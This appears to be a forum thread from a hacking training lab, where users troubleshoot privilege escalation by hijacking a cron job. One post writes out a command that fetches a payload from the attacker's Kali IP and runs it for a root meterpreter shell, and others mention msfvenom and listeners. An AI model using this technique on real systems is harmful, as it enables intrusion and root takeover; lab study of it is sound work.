Hi kevin1, I didn't go the Metasploit route on this one, but you're going to need to change the cronjob within the initial foothold shell when you are www-data. Run the command echo "wget http://<Kali IP>/shell.elf; chmod +x shell.elf; ./shell.elf" > /tmp/clear-dav.sh in the www-data meterpreter session and that will privesc the second meterpreter session to root
(hope that makes sense!)
Hi, unfortunately I'm no further forward, Metasploit didn't accept that command. Still just getting Kali after whoami. Please can some tech wizard on here show me the light 😁?! Thanks 🤞
- jamesstammers 8 days ago
Bronze II
Have you created shell.elf to call back to the correct Kali IP?
Are you hosting that file on an HTTP server the whole time?
Do you have a listener open on the port you specified in msfvenom?
- kevin1 8 days ago
Bronze II
Hi, I've left the www-data Metasploit tab and the wget command tab open that got me the token for answer 4. In tab 3, I used the reverse shell msfvenom command followed by the sudo python command. In tab 4, I set up the Metasploit listener using multi/handler. In the fifth tab, I ran the echo command (as this echo command doesn't seem to work within Metasploit as advised above). Thanks in advance, folks.
- jamesstammers 8 days ago
Bronze II
Can you send some screenshots of the msfvenom command, python http server command and the listener?